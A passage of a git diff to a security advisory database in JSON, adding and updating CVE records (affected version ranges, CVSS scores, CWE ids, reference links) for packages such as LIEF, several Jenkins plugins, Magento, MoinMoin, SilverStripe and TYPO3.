"fixed": "2.0.24" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.1.0" + }, + { + "fixed": "2.1.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.2.0" + }, + { + "fixed": "2.2.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.3" + } + ] + } + ] } ], "references": [ @@ -141,10 +217,22 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/86374" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2013-4752.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2013-4752.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-releases-symfony-2-0-24-2-1-12-2-2-5-and-2-3-3-released" + }, { "type": "WEB", "url": "https://web.archive.org/web/20130901060826/http://www.securityfocus.com/bid/61715" diff --git a/advisories/github-reviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json b/advisories/github-reviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json new file mode 100644 index 0000000000000..f992b432460c3 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-22x7-vwh9-5w4g", + "modified": "2024-02-01T21:22:04Z", + "published": "2022-05-24T19:15:12Z", + "aliases": [ + "CVE-2021-32297" + ], + "summary": "LIEF heap-buffer-overflow", + "details": "An issue was discovered in LIEF through 0.11.0. A heap-buffer-overflow exists in the function main located in `pe_reader.c`. It allows an attacker to cause code Execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "lief" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32297" + }, + { + "type": "WEB", + "url": "https://github.com/lief-project/LIEF/issues/449" + }, + { + "type": "WEB", + "url": "https://github.com/lief-project/LIEF/commit/19e06755e8ce1ecf136360a5c36cded3701ac253" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:22:04Z", + "nvd_published_at": "2021-09-20T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json b/advisories/github-reviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json new file mode 100644 index 0000000000000..86d704e4eb49d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23r7-hf6g-qqqg", + "modified": "2024-01-30T22:29:39Z", + "published": "2022-05-13T01:25:41Z", + "aliases": [ + "CVE-2019-1003090" + ], + "summary": "CSRF vulnerability in Jenkins SOASTA CloudTest Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins SOASTA CloudTest Plugin in the CloudTestServer.DescriptorImpl#doValidate form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.soasta.jenkins:cloudtest" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.25" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003090" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1054" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:29:39Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json b/advisories/github-reviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json new file mode 100644 index 0000000000000..a87a8f00c815f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23xr-9xxr-vg3c", + "modified": "2024-01-30T22:12:36Z", + "published": "2022-05-13T01:48:37Z", + "aliases": [ + "CVE-2018-1000420" + ], + "summary": "Improper authorization vulnerability in Jenkins Mesos Plugin", + "details": "An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to obtain credentials IDs for credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:mesos" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.17.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000420" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1013%20(1)" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:12:36Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json b/advisories/github-reviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json new file mode 100644 index 0000000000000..a3044d7592fa2 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-268v-2qq7-84pf", + "modified": "2024-01-30T21:58:23Z", + "published": "2022-05-13T01:18:20Z", + "aliases": [ + "CVE-2017-1000243" + ], + "summary": "Missing permission check in Jenkins Favorite Plugin", + "details": "Jenkins Favorite Plugin up to and including 2.1.0 does not perform permission checks when changing favorite status, allowing any user to set any other user's favorites", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:favorite" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000243" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/favorite-plugin" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-06-06/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/101946" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:58:23Z", + "nvd_published_at": "2017-11-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json b/advisories/github-reviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json new file mode 100644 index 0000000000000..e0800f16124c4 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-26hw-262c-g9gc", + "modified": "2024-01-30T22:37:12Z", + "published": "2022-05-14T03:13:12Z", + "aliases": [ + "CVE-2018-1000190" + ], + "summary": "Exposure of sensitive information vulnerability in Jenkins Black Duck Hub Plugin", + "details": "A exposure of sensitive information vulnerability exists in Jenkins Black Duck Hub Plugin 4.0.0 and older in PostBuildScanDescriptor.java that allows attackers with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.blackducksoftware.integration:blackduck-hub" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.0.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.0.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000190" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-06-04/#SECURITY-865" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:37:12Z", + "nvd_published_at": "2018-06-05T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json b/advisories/github-reviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json new file mode 100644 index 0000000000000..0bcb8eae4ac94 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-278v-j3cr-jv2x", + "modified": "2024-01-30T22:18:53Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003020" + ], + "summary": "Jenkins Kanboard Plugin vulnerable to Server-side request forgery (SSRF)", + "details": "A server-side request forgery vulnerability exists in Jenkins Kanboard Plugin 1.5.10 and earlier in KanboardGlobalConfiguration.java that allows attackers with Overall/Read permission to submit a GET request to an attacker-specified URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:kanboard" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.11" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5.10" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003020" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-818" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:18:53Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-298q-wv2h-v5vw/GHSA-298q-wv2h-v5vw.json b/advisories/github-reviewed/2022/05/GHSA-298q-wv2h-v5vw/GHSA-298q-wv2h-v5vw.json index 14e988035294a..7be00aefcd98d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-298q-wv2h-v5vw/GHSA-298q-wv2h-v5vw.json +++ b/advisories/github-reviewed/2022/05/GHSA-298q-wv2h-v5vw/GHSA-298q-wv2h-v5vw.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8142" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8142.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-29mr-gr4c-vf9c/GHSA-29mr-gr4c-vf9c.json b/advisories/github-reviewed/2022/05/GHSA-29mr-gr4c-vf9c/GHSA-29mr-gr4c-vf9c.json index f4b4304a175a9..534830a7bef9a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-29mr-gr4c-vf9c/GHSA-29mr-gr4c-vf9c.json +++ b/advisories/github-reviewed/2022/05/GHSA-29mr-gr4c-vf9c/GHSA-29mr-gr4c-vf9c.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8115" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8115.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-2cg3-w597-rjfv/GHSA-2cg3-w597-rjfv.json b/advisories/github-reviewed/2022/05/GHSA-2cg3-w597-rjfv/GHSA-2cg3-w597-rjfv.json index 45dc6fa8ba89a..5d1c2a4636e36 100644 --- a/advisories/github-reviewed/2022/05/GHSA-2cg3-w597-rjfv/GHSA-2cg3-w597-rjfv.json +++ b/advisories/github-reviewed/2022/05/GHSA-2cg3-w597-rjfv/GHSA-2cg3-w597-rjfv.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8107" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8107.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json b/advisories/github-reviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json new file mode 100644 index 0000000000000..7e92ee1cf6cee --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cm5-f78c-h2c8", + "modified": "2024-01-30T22:19:19Z", + "published": "2022-05-13T01:36:51Z", + "aliases": [ + "CVE-2017-2652" + ], + "summary": "Missing permission checks in Jenkins Distributed Fork Plugin", + "details": "It was found that there were no permission checks performed in the Distributed Fork plugin before and including 1.5.0 for Jenkins that provides the dist-fork CLI command beyond the basic check for Overall/Read permission, allowing anyone with that permission to run arbitrary shell commands on all connected nodes.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:distfork" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2652" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/96980" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:19:19Z", + "nvd_published_at": "2018-07-27T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-2crc-5vq6-386r/GHSA-2crc-5vq6-386r.json b/advisories/github-reviewed/2022/05/GHSA-2crc-5vq6-386r/GHSA-2crc-5vq6-386r.json index 24de8de6b1f43..d78a911a82b1c 100644 --- a/advisories/github-reviewed/2022/05/GHSA-2crc-5vq6-386r/GHSA-2crc-5vq6-386r.json +++ b/advisories/github-reviewed/2022/05/GHSA-2crc-5vq6-386r/GHSA-2crc-5vq6-386r.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8111" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8111.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-2fhr-f6q6-c4p2/GHSA-2fhr-f6q6-c4p2.json b/advisories/github-reviewed/2022/05/GHSA-2fhr-f6q6-c4p2/GHSA-2fhr-f6q6-c4p2.json index 77b333cc04797..1c7e53a842e83 100644 --- a/advisories/github-reviewed/2022/05/GHSA-2fhr-f6q6-c4p2/GHSA-2fhr-f6q6-c4p2.json +++ b/advisories/github-reviewed/2022/05/GHSA-2fhr-f6q6-c4p2/GHSA-2fhr-f6q6-c4p2.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7950" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7950.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json b/advisories/github-reviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json new file mode 100644 index 0000000000000..c21bb830ef65f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j76-26qq-7rvv", + "modified": "2024-02-08T15:43:48Z", + "published": "2022-05-17T05:49:23Z", + "aliases": [ + "CVE-2010-2969" + ], + "summary": "MoinMoin cross-site scripting (XSS) vulnerability", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.7.3 and earlier, and 1.9.x before 1.9.3, allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/LikePages.py, (2) action/chart.py, and (3) action/userprofile.py, a similar issue to CVE-2010-2487.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "moin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.7.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "moin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2969" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moinwiki/moin" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20140801154518/http://secunia.com/advisories/40836" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228150629/http://www.securityfocus.com/bid/40549" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584809" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.7/rev/37306fba2189" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/raw-file/1.9.3/docs/CHANGES" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/rev/e50b087c4572" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127799369406968&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127809682420259&w=2" + }, + { + "type": "WEB", + "url": "http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg" + }, + { + "type": "WEB", + "url": "http://moinmo.in/MoinMoinRelease1.9" + }, + { + "type": "WEB", + "url": "http://moinmo.in/SecurityFixes" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2083" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:43:48Z", + "nvd_published_at": "2010-08-05T13:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-2pw2-qpcp-m47x/GHSA-2pw2-qpcp-m47x.json b/advisories/github-reviewed/2022/05/GHSA-2pw2-qpcp-m47x/GHSA-2pw2-qpcp-m47x.json index 7facc0fb146c4..1f49d359b482e 100644 --- a/advisories/github-reviewed/2022/05/GHSA-2pw2-qpcp-m47x/GHSA-2pw2-qpcp-m47x.json +++ b/advisories/github-reviewed/2022/05/GHSA-2pw2-qpcp-m47x/GHSA-2pw2-qpcp-m47x.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.7.5" + } + ] + } + ] } ], "references": [ @@ -40,6 +59,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9311" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2020-9311.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-cms" @@ -47,6 +70,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2020-9311" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2020-9311/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json b/advisories/github-reviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json new file mode 100644 index 0000000000000..9a12bd0225ca8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2q2r-xgj5-h3hm", + "modified": "2024-02-08T22:03:51Z", + "published": "2022-05-02T03:48:54Z", + "aliases": [ + "CVE-2009-3821" + ], + "summary": "Apache Solr Search for TYPO3 vulnerable to Cross-site Scripting", + "details": "Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "apache-solr-for-typo3/solr" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3821" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3-Solr/ext-solr/commit/5192f489a13ff9417d7b57c63420187789beea5b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-Solr/ext-solr" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-014/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T22:03:51Z", + "nvd_published_at": "2009-10-28T10:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json b/advisories/github-reviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json new file mode 100644 index 0000000000000..61d73b35bb61e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2r46-cwgm-vvjx", + "modified": "2024-01-30T21:44:05Z", + "published": "2022-05-13T01:15:04Z", + "aliases": [ + "CVE-2019-10279" + ], + "summary": "Missing permission check in Jenkins jenkins-reviewbot Plugin", + "details": "A missing permission check in Jenkins jenkins-reviewbot Plugin in the ReviewboardDescriptor#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:jenkins-reviewbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.4.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10279" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1091" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:44:05Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json b/advisories/github-reviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json new file mode 100644 index 0000000000000..19329e3b396c9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json @@ -0,0 +1,127 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2wgg-c8xc-7gg3", + "modified": "2024-02-08T21:36:52Z", + "published": "2022-05-02T03:46:56Z", + "aliases": [ + "CVE-2009-3628" + ], + "summary": "TYPO3 Backend Discloses Encryption Key", + "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to determine an encryption key via crafted input to a tt_content form element.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } 